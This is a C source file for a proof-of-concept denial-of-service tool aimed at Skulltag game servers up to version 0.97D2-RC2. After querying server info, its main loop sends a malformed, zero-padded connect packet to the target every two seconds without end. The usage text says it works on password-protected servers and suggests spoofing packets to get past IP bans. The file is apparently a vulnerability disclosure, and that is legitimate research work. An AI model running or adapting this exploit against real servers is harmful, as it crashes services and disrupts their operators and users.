/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "sv_huffman.c"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        10666
#define BUFFSZ      8192    // max supported by the game (recvfrom)
#define TWAIT       5
#define ATTACKWAIT  2



u8 *skulltag_info(u8 *p);
void delimit(u8 *data);
int mycpy(u8 *dst, u8 *src);
int doom_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    int     sd,
            len;
    u16     port        = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Skulltag <= v0.97D2-RC2 packet parsing DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            "Note: works also on servers protected by password without knowing the keyword\n"
            "      but can't work if the IP is banned (except if packets are spoofed)\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port    = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), port);

    HuffInit();

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p = buff;
    p += putxx(p, 199,          32);
    p += putxx(p, 0x001f7fff,   32);
    len = doom_send_recv(sd, buff, p - buff, buff, sizeof(buff), 1);
    if(len > 8) skulltag_info(buff);

    printf("\n- start to send a malformed connect packet each %d seconds:\n", ATTACKWAIT);
    for(;;) {
        p = buff;               // memset(buff, 0, BUFFSZ) was enough
        *p++ = 0;
        p   += mycpy(p, "");    // version (not needed)
        p   += mycpy(p, "");    // password (not needed)
        *p++ = 1;
        *p++ = 0;
        *p++ = 8;
        p   += mycpy(p, "");    // version hash (not needed)
        p   += putcc(p, 0, BUFFSZ - (p - buff));

        len = doom_send_recv(sd, buff, p - buff, NULL, 0, 1);
        sleep(ONESEC * ATTACKWAIT);
    }

    close(sd);
    return(0);
}



u8 *skulltag_info(u8 *p) {
    u32     dunno,
            ffffffff;
    int     i,
            wadnum;
    u8      *ver;

    printf("\n");
    p += getxx(p, &dunno,       32);
    p += getxx(p, &ffffffff,    32);
    ver   = strdup(p);
    printf("  version        %s\n",     p);     p += strlen(p) + 1;
    /* ID */                                    p += 4;
    printf("  hostname       %s\n",     p);     p += strlen(p) + 1;
    printf("  wad URL        %s\n",     p);     p += strlen(p) + 1;
    printf("  e-mail         %s\n",     p);     p += strlen(p) + 1;
    printf("  mapname        %s\n",     p);     p += strlen(p) + 1;
    printf("  max clients    %hhu\n",  *p);     p++;
    printf("  max players    %hhu\n",  *p);     p++;
    printf("  wads           ");
    wadnum = *p++;
    for(i = 0; i < wadnum; i++) {
        printf("%s ", p);                       p += strlen(p) + 1;
    }
    printf("\n");
    printf("  gametype       %hhu\n",  *p);     p++;
    /* dunno */                                 p += 2;
    printf("  gamename       %s\n",     p);     p += strlen(p) + 1;
    printf("  iwad           %s\n",     p);     p += strlen(p) + 1;
    printf("  password       %hhu\n",  *p);     p++;
    printf("  join password  %hhu\n",  *p);     p++;
    printf("  gameskill      %hhu\n",  *p);     p++;
    printf("  botskill       %hhu\n",  *p);     p++;
    /* the rest is useless */
    return(ver);
}



void delimit(u8 *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int mycpy(u8 *dst, u8 *src) {
    u8      *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p++ = 0;
    return(p - dst);
}



int doom_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err) {
    int     len;
    u8      buff[BUFFSZ];

    HuffEncode(in, buff, insz, &len);
    len = send_recv(sd, buff, len, out ? buff : NULL, sizeof(buff), err);
    if(len > 0) HuffDecode(buff, out, len, &len);
    return(len);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 1)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


